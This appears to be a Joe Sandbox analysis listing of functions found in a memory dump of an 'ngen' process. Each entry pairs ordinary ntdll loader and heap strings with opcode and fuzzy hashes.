                                                Function 058A15F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrmap.c, xrefs: 058EA59A
                                                • LdrpCompleteMapModule, xrefs: 058EA590
                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 058EA589
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                • API String ID: 0-1676968949
                                                • Opcode ID: 24ae226537d3a864298d04abee560a6050606f9d3f0433c4194a7e93b1a99b72
                                                • Instruction ID: 6214dce1c0e789fdad9d11b7a089680dad38b0e1803eb1ac1008772307c70d47
                                                • Opcode Fuzzy Hash: 24ae226537d3a864298d04abee560a6050606f9d3f0433c4194a7e93b1a99b72
                                                • Instruction Fuzzy Hash: EA51F1727087449BEB25CE58C94CB2677F9BB81B28F180664ED52DB6E1D774EC01C741
                                                Function 058BC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 058F82DE
                                                • minkernel\ntdll\ldrinit.c, xrefs: 058F82E8
                                                • Failed to reallocate the system dirs string !, xrefs: 058F82D7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1783798831
                                                • Opcode ID: 35ac46c6d3b845b12ebd4e0d8ef8e4132a2c7e0dd9fec565cdba04d2346aa4af
                                                • Instruction ID: 9af11115724d5fcbbf04e9af59175646d57475e88c9e4078bef265e568e0a82a
                                                • Opcode Fuzzy Hash: 35ac46c6d3b845b12ebd4e0d8ef8e4132a2c7e0dd9fec565cdba04d2346aa4af
                                                • Instruction Fuzzy Hash: 6F41D371659308EBD720EB68D849F9B7BE8FF48650F04492AFD45D7250EB74EC008B96
                                                Function 0587758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                • API String ID: 0-1151232445
                                                • Opcode ID: 1215e480e23d40b583757539204f927315136ed1b0e85d90146b9ba35e45aeed
                                                • Instruction ID: 2c9b08fd385f3329c609c5354e526391025d51ad123960d3261e44da323ad4a3
                                                • Opcode Fuzzy Hash: 1215e480e23d40b583757539204f927315136ed1b0e85d90146b9ba35e45aeed
                                                • Instruction Fuzzy Hash: 0541E6B03042489FDF29CA6CC484F79F7E2EF01258F2844A9DC46CB25ADA74DC86C765
                                                Function 058B16CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrtls.c, xrefs: 058F1B4A
                                                • LdrpAllocateTls, xrefs: 058F1B40
                                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 058F1B39
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                • API String ID: 0-4274184382
                                                • Opcode ID: bcd9855ac5166e0b150c2653f72ce0bbee8ccac6db2510b5499e29848b3a2526
                                                • Instruction ID: ddfc340a369be3e879d4e79b0341c493a21e9cf32027e1c55ad75ae50084d751
                                                • Opcode Fuzzy Hash: bcd9855ac5166e0b150c2653f72ce0bbee8ccac6db2510b5499e29848b3a2526
                                                • Instruction Fuzzy Hash: AA4137B5A04608AFDB15DFA8C849AAEBBF5FF48604F148519E806E7354DB75AC00CBA4
                                                Function 0593C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                Download Yara Rule
                                                Strings
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0593C1C5
                                                • @, xrefs: 0593C1F1
                                                • PreferredUILanguages, xrefs: 0593C212
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                • Opcode ID: 4ac5ab6c96f1e9bb25484e849a18acdee0b68d968f3f4477f3c00991e324b301
                                                • Instruction ID: 17bd66a61b1da638eb65b9feeb7be958575eb33e84c99cf9df0f9ed6be771ffc
                                                • Opcode Fuzzy Hash: 4ac5ab6c96f1e9bb25484e849a18acdee0b68d968f3f4477f3c00991e324b301
                                                • Instruction Fuzzy Hash: 3C413872A00619EBDF11DAD8C886BEEBBBDAF04700F14406AE906F7280D774DE448B91
                                                Function 05904755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 05904899
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05904888
                                                • LdrpCheckRedirection, xrefs: 0590488F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                • Opcode ID: d2e5c9eb8705f088f4b1ef5dffc7dd0b0fac0735f48873c3f60b2247cf946758
                                                • Instruction ID: c1aee1d1b81a7d274e1db3723e00781c1c2193631050f0803697b754bf4617cf
                                                • Opcode Fuzzy Hash: d2e5c9eb8705f088f4b1ef5dffc7dd0b0fac0735f48873c3f60b2247cf946758
                                                • Instruction Fuzzy Hash: CC41AE32A086509FCF21CE68D840A267BEABF89A50F091D69EE4DD7291D734E800CB91
                                                Function 05914144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                • Opcode ID: 812be6cedb71086ad5c0136932f9fbd4d672aa0e33cd84c21db4569e97af5c53
                                                • Instruction ID: 844f20726f169e3a493b516a7aac5bbf3041959a838883553dcd181327588042
                                                • Opcode Fuzzy Hash: 812be6cedb71086ad5c0136932f9fbd4d672aa0e33cd84c21db4569e97af5c53
                                                • Instruction Fuzzy Hash: 7C41F232A0436C8BEF25DB98C944BADB7B9FF99340F240859DD06EF781DA348941CB55
                                                Function 058B33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlCreateActivationContext, xrefs: 058F29F9
                                                • SXS: %s() passed the empty activation context data, xrefs: 058F29FE
                                                • Actx , xrefs: 058B33AC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                • API String ID: 0-859632880
                                                • Opcode ID: 194de0cb040a763714b6c92f303a63ba1786c5ae6b8d884af5caac77913455bd
                                                • Instruction ID: c4a292ac3714b9f8e2b5b77c0debbe8a1f06d80b54a2b07559a22875f56eebd9
                                                • Opcode Fuzzy Hash: 194de0cb040a763714b6c92f303a63ba1786c5ae6b8d884af5caac77913455bd
                                                • Instruction Fuzzy Hash: 433123322007059FEB26DE58C884FAA77A9BB48724F154869ED06DF381CBB4EC41C7A1
                                                Function 0590B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                Download Yara Rule
                                                Strings
                                                • @, xrefs: 0590B670
                                                • GlobalFlag, xrefs: 0590B68F
                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0590B632
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                • API String ID: 0-4192008846
                                                • Opcode ID: 2562f38a7c870ba50db633d34a8199d534d5839dd2e48f9519f2f34aa4a21262
                                                • Instruction ID: 335dbd11ac871e90c7eceb6e2d404e544243e12d837684b252e606bd422f5c20
                                                • Opcode Fuzzy Hash: 2562f38a7c870ba50db633d34a8199d534d5839dd2e48f9519f2f34aa4a21262
                                                • Instruction Fuzzy Hash: F83141B1A00219AFDB11EF94DC84AEEBBBDEF44754F140869EA05E7290D775DE00CBA4
                                                Function 058B1607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpInitializeTls, xrefs: 058F1A47
                                                • minkernel\ntdll\ldrtls.c, xrefs: 058F1A51
                                                • DLL "%wZ" has TLS information at %p, xrefs: 058F1A40
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                • API String ID: 0-931879808
                                                • Opcode ID: 3a2b79ddca934ab24733097b5d7f264e1ee5319ec9740706b1b7d806a40d2828
                                                • Instruction ID: 632452bfd6da0c5a1bb66e04d18222a78ecaf6ff5bd31c62dbe8e53080574a8d
                                                • Opcode Fuzzy Hash: 3a2b79ddca934ab24733097b5d7f264e1ee5319ec9740706b1b7d806a40d2828
                                                • Instruction Fuzzy Hash: 9F31C671B14308ABFB109B58C89EFAA76BDFB46754F05011AFD05EB290DBB0AD00C790
                                                Function 059020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 05902104
                                                • LdrpInitializationFailure, xrefs: 059020FA
                                                • Process initialization failed with status 0x%08lx, xrefs: 059020F3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                • Opcode ID: df7b40ae5c25b7cec68072231f485d8e31b1dcb1a17578a9b9d912589ea6aeee
                                                • Instruction ID: 9f0e6e4d10bc5a9fce090ead9893f46305ffc189a4cf089adf85c9f3caec8fec
                                                • Opcode Fuzzy Hash: df7b40ae5c25b7cec68072231f485d8e31b1dcb1a17578a9b9d912589ea6aeee
                                                • Instruction Fuzzy Hash: 74F0F434640308AFDB14E60CCD4BFA93BACEB40A54F440495FA00AB281D6B4A900DA91
                                                Function 058FE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: 6db1e33e61e60442d77dffe70bd5044f8aefe0c04162db9ba64b48e4cccaed4f
                                                • Instruction ID: 58d77152bb2309fbcea8365aa13916cb22c2509e9c1b8f81a8143c3560405e48
                                                • Opcode Fuzzy Hash: 6db1e33e61e60442d77dffe70bd5044f8aefe0c04162db9ba64b48e4cccaed4f
                                                • Instruction Fuzzy Hash: 3A614A71E143089FDB64DFA89845BAEBBB9FB48704F14406DEA49EB261D731ED40CB50
                                                Function 0589F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$$
                                                • API String ID: 0-233714265
                                                • Opcode ID: 233d49d32a852d145fe3533b01ffe7ae75855456fffae08ab9b56978dd23e372
                                                • Instruction ID: a27fae7d620a0c3be86e3186e4048fc29f7707faa2d3d0cb5e9d07e34d82c9c1
                                                • Opcode Fuzzy Hash: 233d49d32a852d145fe3533b01ffe7ae75855456fffae08ab9b56978dd23e372
                                                • Instruction Fuzzy Hash: 8E61E271A0474ADBDF29DF68C585BACB7B2FF44308F184029DA15EB240DB74AD81CB81
                                                Function 058804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                • kLsE, xrefs: 05880540
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0588063D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 0-2547482624
                                                • Opcode ID: f3f993060b1703c30fece8c9b242bf73e05f3b18f450a5f70c4dd16c76eeb897
                                                • Instruction ID: c4f8d9e4760b3054c8f4f02e782565a1cdea48fccaeeda1bf3bd4d633afe79e0
                                                • Opcode Fuzzy Hash: f3f993060b1703c30fece8c9b242bf73e05f3b18f450a5f70c4dd16c76eeb897
                                                • Instruction Fuzzy Hash: FB516B71604746CBC724EF69C548AB7B7E5FF84304F04483EE99AC7240E7749949CBA2
                                                Function 059135BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                • API String ID: 0-118005554
                                                • Opcode ID: 9a24d410b88a51a33a1b021fefaee279f90ae88bf59f6240cd0db059288bfec9
                                                • Instruction ID: 6241b984c54cbcf2b11cabf1f654a0d6f2ff84c648a6a8f9e3e66dd04b29f800
                                                • Opcode Fuzzy Hash: 9a24d410b88a51a33a1b021fefaee279f90ae88bf59f6240cd0db059288bfec9
                                                • Instruction Fuzzy Hash: 55319C322087599BD311DB28D859B2AB7F8FF84790F080C69FC95CB390EA34D905CB96
                                                Function 058B34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpInitializeAssemblyStorageMap, xrefs: 058F2A90
                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 058F2A95
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                • API String ID: 0-2653619699
                                                • Opcode ID: b3a80d5cc4173623ab83db792929040cfba44cd95ac5d8ea59ff98503c169420
                                                • Instruction ID: 5fd0e154fede7bce62095538717911170ffa68634bc81cf6e3ffdd6a6c4b7825
                                                • Opcode Fuzzy Hash: b3a80d5cc4173623ab83db792929040cfba44cd95ac5d8ea59ff98503c169420
                                                • Instruction Fuzzy Hash: 75112C71704204BBFB36CA4C8D41FAF76ADEB94B54F1880297E05DB344D6B5CD0083A1
                                                Function 058BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                • Opcode ID: 94eebf268af24d1549aac170d8ac72a92997bdacb8f1495755db70f85375305b
                                                • Instruction ID: 202f51158c869a75c14b9cb57a58bf9cd9d3cf269ff73c2ba7ae5311dc597761
                                                • Opcode Fuzzy Hash: 94eebf268af24d1549aac170d8ac72a92997bdacb8f1495755db70f85375305b
                                                • Instruction Fuzzy Hash: 1601F4B2254704AFE311DF18CD4AF667BE8E755B25F008939B948C7290EB78ED04CB4A
                                                Function 0588C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                • Opcode ID: 14120ca3f09c9fbc6425cd049047efbee926fb129655eeb2698358cbfef7545b
                                                • Instruction ID: 2f29709f1d34cb7c5361b266f178d8d92e7e56b8802182451c9a18992150ca7e
                                                • Opcode Fuzzy Hash: 14120ca3f09c9fbc6425cd049047efbee926fb129655eeb2698358cbfef7545b
                                                • Instruction Fuzzy Hash: 2D824875E052188BDB24EFA9C984BBDB7B2FF48314F148169EC5AEB294D730AD41CB50
                                                Function 058BF603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 558dfa33673e4ff0fa5c287c480c9e262b53a0503f52b032bcfbb8b4dbe3e7c3
                                                • Instruction ID: 2b5deef81f64bc99e1bf22d547b9f37baa25cc7681dd204ba9e39cfaace8e7e3
                                                • Opcode Fuzzy Hash: 558dfa33673e4ff0fa5c287c480c9e262b53a0503f52b032bcfbb8b4dbe3e7c3
                                                • Instruction Fuzzy Hash: 73412AB4D042889FDB24CFA9C881AEEBBF8FB49300F50456EE959E7211DB709940DF60
                                                Function 058BA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                • Opcode ID: 67d5e6b0df7fcb79d83b6997e9453b0859775a7378a0254b181acbe4552a91f9
                                                • Instruction ID: 0c7539c9bf756afad445bfe8ca7fcd496506b45a00e2ecf3b95d8ca6125f31d7
                                                • Opcode Fuzzy Hash: 67d5e6b0df7fcb79d83b6997e9453b0859775a7378a0254b181acbe4552a91f9
                                                • Instruction Fuzzy Hash: 08716C75E0421ADFDF28CF9AD591AADBBB2BF48700F14822EE906E7240E7719D41CB50
                                                Function 0588973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                • Instruction ID: e177bf20b623e2741eb03566f47a2e78cfd3735510c5c0ebf768aeeddb09b2dd
                                                • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                • Instruction Fuzzy Hash: 59615775D04219ABDB21EFA9C845BBEBBB9FF84714F144169EC12E7290D7349E00CBA0
                                                Function 0590F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                • Instruction ID: defde22f4a09a1641353f2359ca41ddc89a3651f7b15e63b1e52c517fcb891de
                                                • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                • Instruction Fuzzy Hash: FB519D72604705AFDB219F58C844F6AB7E8FB84B50F040929B991D7290EB74EE44CB92
                                                Function 0589E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: EXT-
                                                • API String ID: 0-1948896318
                                                • Opcode ID: fda04fec9c1ba5cf0a4befc946c5dec90551e4e0b85341a4ae984f079e40bc1f
                                                • Instruction ID: a77cb690bcbdcb5f1748082de172766898c6278f2df3340e1e7ecc6f3baf5c99
                                                • Opcode Fuzzy Hash: fda04fec9c1ba5cf0a4befc946c5dec90551e4e0b85341a4ae984f079e40bc1f
                                                • Instruction Fuzzy Hash: 47418076609341ABDB29DA78C884B6BBBECAF88718F48092DFD85D7140E674DD04C793
                                                Function 058FC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: 26f8d04d0d34fe9ba55d8b218155a381e7a585507062847ebccd5c8907907744
                                                • Instruction ID: 3e76056e52171630d3d2f01c3c75da6b01a0f13b2465d88c7715a1076b6e7645
                                                • Opcode Fuzzy Hash: 26f8d04d0d34fe9ba55d8b218155a381e7a585507062847ebccd5c8907907744
                                                • Instruction Fuzzy Hash: D24161B1E1462CAADB219A54DC85FDEB77CAB48714F0045E5EB08EB140DB309F898FA5
                                                Function 059097A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: verifier.dll
                                                • API String ID: 0-3265496382
                                                • Opcode ID: 187baa2efa1e7e5935d0cb85f6c5ac4ad6c32a263a2652e397cb6d6afb0bef30
                                                • Instruction ID: 27f08a9a6eeb2b1e1039080ae7edb2b1ac0156687509f1534e419e3eb50a99de
                                                • Opcode Fuzzy Hash: 187baa2efa1e7e5935d0cb85f6c5ac4ad6c32a263a2652e397cb6d6afb0bef30
                                                • Instruction Fuzzy Hash: 1E31A071B143019FDB249F289851B36B7E9FB48710F55983AED49DF3C2EA358C808790
                                                Function 0592705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: kLsE
                                                • API String ID: 0-3058123920
                                                • Opcode ID: 66526cf5555f24416cc53a04f7ea6d44661a0a39febdd2c53da1da8966b9a576
                                                • Instruction ID: ea87a77581e3e9f11a1cb782ce8afc4f82a1df6846bed043eda7bf71882e8e74
                                                • Opcode Fuzzy Hash: 66526cf5555f24416cc53a04f7ea6d44661a0a39febdd2c53da1da8966b9a576
                                                • Instruction Fuzzy Hash: 96417C712297688BE720EBA5E94EB793F98FB80B64F14011EFC51DA1C6CF741885C7A1
                                                Function 058B7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                • Instruction ID: e32e3a48d2b57b673c06bd8b4156bebc9de7cbd4bdb8830aedb099d5fbcf2327
                                                • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                • Instruction Fuzzy Hash: B8414975A0061AABEF25DF48C490ABEB7B9FB84605F00405AED46E7350DB749E41CBE1
                                                Function 058B36EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Flst
                                                • API String ID: 0-2374792617
                                                • Opcode ID: 92385dd160a3876b3ed04a2567c5dd650889cf08a4e8c44c8cd128a686ee12ef
                                                • Instruction ID: 600ef9de3a30b2295da287e44d88ed8b2db3424fe575c65ffa0f28f3224876ab
                                                • Opcode Fuzzy Hash: 92385dd160a3876b3ed04a2567c5dd650889cf08a4e8c44c8cd128a686ee12ef
                                                • Instruction Fuzzy Hash: 044198B5209301DFE714CF18C480A66FBE9FB49714F14856EE85ACB241EB71DD42CB96
                                                Function 05885096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
